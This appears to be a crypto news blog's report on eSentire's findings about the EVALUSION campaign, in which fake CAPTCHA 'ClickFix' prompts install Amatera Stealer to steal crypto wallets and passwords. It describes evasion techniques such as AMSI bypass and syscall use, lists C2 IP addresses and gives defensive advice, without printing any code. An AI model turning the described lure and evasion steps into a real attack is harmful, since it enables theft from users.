Cybersecurity researchers uncovered a sophisticated malware campaign using fake CAPTCHA to deploy Amatera Stealer, an information-stealing tool specifically designed to target cryptocurrency wallets. The malware, tracked by eSentire as part of the EVALUSION campaign, compromises 149+ browser-based crypto wallets and 43+ password managers through advanced evasion techniques that bypass standard security tools.
Amatera represents a rebranded version of ACR (AcridRain) Stealer, which threat actor SheldIO sold as malware-as-a-service until July 2024, when the source code was sold privately. The new version sells for $199 monthly or $1,499 annually, making advanced wallet-stealing capabilities accessible to less sophisticated attackers.
eSentire’s Threat Response Unit documented the campaign in November 2025 after observing multiple infection chains beginning with the ClickFix social engineering tactic. Victims are tricked into executing malicious commands through the Windows Run dialog under the pretense of completing a CAPTCHA verification or fixing a system issue.
How the Attack Works
The infection starts when users visit compromised websites or click phishing links disguised as legitimate services. A fake CAPTCHA prompt appears, instructing users to press Windo
ws+R to open the Run dialog, then Ctrl+V to paste a command, and Enter to execute it. This three-step process feels legitimate enough that many users comply without questioning.
Once executed, the command triggers a multi-stage payload delivery chain. A .NET-based downloader retrieves an encrypted payload from file-sharing services like MediaFire, decrypts it using RC2 encryption, and loads a DLL packed with Pure Crypter. The malware uses obfuscated PowerShell code with XOR encryption to bypass Windows Anti-Malware Scan Interface (AMSI).
Amatera employs WoW64 SysCalls to evade user-mode hooking mechanisms used by sandboxes, antivirus solutions, and endpoint detection products. It overwrites the AmsiScanBuffer string in clr.dll memory, effectively disabling AMSI scanning for subsequent attack stages. These evasion techniques allow Amatera to operate undetected on systems with current security software.
After establishing persistence, Amatera harvests extensive data, including saved passwords, credit cards, browsing history, cryptocurrency wallet files, desktop wallet applications, FTP credentials, email account data, and VPN configurations. The malware specifically targets browser-based wallet extensions for MetaMask, Phantom, Trust Wallet, Coinbase Wallet, and 145 other crypto wallets.
Selective Deployment of Remote Access Tools
What makes this campaign particularly dangerous is Amatera’s built-in logic for selective payload deployment. The malware checks whether the infected machine contains cryptocurrency wallet files or belongs to a corporate domain before deploying additional tools. If neither condition is met, the attack stops at the data exfiltration stage.
For high-value targets, Amatera downloads NetSupport RAT, giving attackers full remote access to the compromised system. eSentire identified the NetSupport configuration with licensee “KAKAN,” associated with the EVALUSION cluster previously observed in similar campaigns. Other payloads deployed on valuable targets include Amadey, Vidar, and Lumma stealers.
This selective approach helps attackers avoid detection by focusing resources on machines containing actual crypto assets or corporate networks. Low-value home computers get data scraped, but don’t receive the remote access tool that might trigger security alerts.
Stolen data is compressed into zip files and exfiltrated through AES-256-CBC-encrypted communications tunneled over TLS. The encryption makes traffic inspection nearly impossible for network monitoring tools. Command-and-control servers operate at 91.98.229.246 (Hetzner) and 45.94.47.224 (Hosting Industry Ltd).
Multiple Campaign Variants
Security researchers documented several variants of the EVALUSION campaign using different lures and delivery mechanisms. The SmartApeSG variant compromises legitimate websites by injecting malicious JavaScript that redirects visitors to fake ClickFix pages mimicking Cloudflare Turnstile security checks.
Another variant uses fake Booking.com CAPTCHA pages to harvest hotel booking credentials before deploying the stealer. Email campaigns distribute Visual Basic Script attachments disguised as invoices, which execute batch scripts to invoke PowerShell loaders. Spoofed internal corporate email alerts with fake delivery notifications prompt victims to click on malicious links.
The diversity of attack vectors shows coordinated effort by multiple threat actors leveraging the same core malware-as-a-service offering. Amatera’s subscription model enables this distribution, with different criminal groups running their own campaigns using purchased access to the tool.
Why Crypto Wallets Are Prime Targets
Cryptocurrency wallets present uniquely attractive targets for cybercriminals compared to traditional financial accounts. Once attackers obtain private keys or seed phrases, they can transfer funds globally within minutes without intermediaries. Unlike bank fraud, crypto transactions are irreversible. Victims cannot call their bank to reverse fraudulent transfers or recover stolen funds.
A single compromised wallet can yield hundreds of thousands or millions of dollars, depending on the holder’s balance. Malware operators focus their efforts on detecting and extracting wallet files, browser wallet extensions, and private keys rather than low-value personal data.
The decentralized nature of cryptocurrency makes attribution difficult and asset recovery nearly impossible. Stolen funds can be laundered through mixing services, decentralized exchanges, and privacy coins within hours of theft. Law enforcement rarely recovers significant amounts from crypto thefts, even when attackers are eventually identified.
Browser-based wallet extensions store credentials locally, making them vulnerable to malware with sufficient system access. Desktop wallets similarly keep private keys in files that information stealers specifically target. Hardware wallets provide better security, but most users rely on software wallets for daily transactions.
See also: What is a DeFi Wallet and How Does It Work for Beginners?
Defense Recommendations
eSentire recommends several defensive measures against ClickFix-based attacks. Organizations should disable mshta.exe via AppLocker or Windows Defender Application Control to prevent HTA file execution. Removing the Run menu from the Start Menu through Group Policy eliminates the primary attack vector for ClickFix exploits.
Security awareness training should specifically cover fake CAPTCHA prompts and social engineering tactics that instruct users to open the Run dialog and paste commands. Most legitimate services never require users to execute commands through Windows Run.
Deploying 24/7 managed detection and response services alongside next-generation antivirus or endpoint detection products provides defense against sophisticated threats using advanced evasion techniques. Traditional signature-based antivirus software cannot detect polymorphic malware like Amatera that changes its code with each deployment.
For cryptocurrency holders specifically, using hardware wallets for significant holdings reduces exposure to software-based thieves. Enabling multi-factor authentication on exchange accounts and wallet applications adds another layer of protection. Regularly reviewing authorized applications and browser extensions helps identify suspicious additions.
Network segmentation keeps valuable assets on isolated systems that don’t browse the internet or open email attachments. Air-gapped systems for crypto storage eliminate remote attack vectors entirely, though this creates usability challenges for active traders.
See also: Trezor Crypto Wallet Investigates Phishing Campaign, Company Executive Reports
Rising Threat to Crypto Users
The EVALUSION campaign represents the growing sophistication of crypto-targeted malware. As cryptocurrency adoption increases, more users hold significant balances in software wallets vulnerable to information thieves. The malware-as-a-service model enables even inexperienced attackers to deploy sophisticated tools previously available only to advanced persistent threat groups.
Amatera’s selective deployment logic shows attackers optimizing their operations for maximum return. Rather than deploying expensive remote access tools on every infected machine, they focus on high-value targets containing actual crypto assets or corporate network access. This efficiency makes the campaigns more profitable and harder to detect.
The fake CAPTCHA technique exploits user trust in familiar security mechanisms. Users have been conditioned to expect CAPTCHA challenges on websites and may not question prompts that appear related to verification processes. Attackers leverage this conditioning to trick victims into executing malicious commands.
eSentire released a configuration extractor tool to help security researchers analyze Amatera samples and decrypt command-and-control communications. The tool reveals encrypted C2 server addresses and AES keys for network traffic analysis. CyberChef recipes provided by eSentire enable decryption of captured C2 communications for threat intelligence.
For crypto users, the campaign serves as a reminder that software wallets remain vulnerable to advanced malware regardless of security tools installed on the system. Hardware wallets, air-gapped storage, and extreme caution with any prompt requesting command execution remain the most reliable defenses against credential-stealing attacks.
If you’re reading this, you’re already ahead. Stay there by joining Dipprofit’s private Telegram community.
Discover more from Dipprofit
Subscribe to get the latest posts sent to your email.
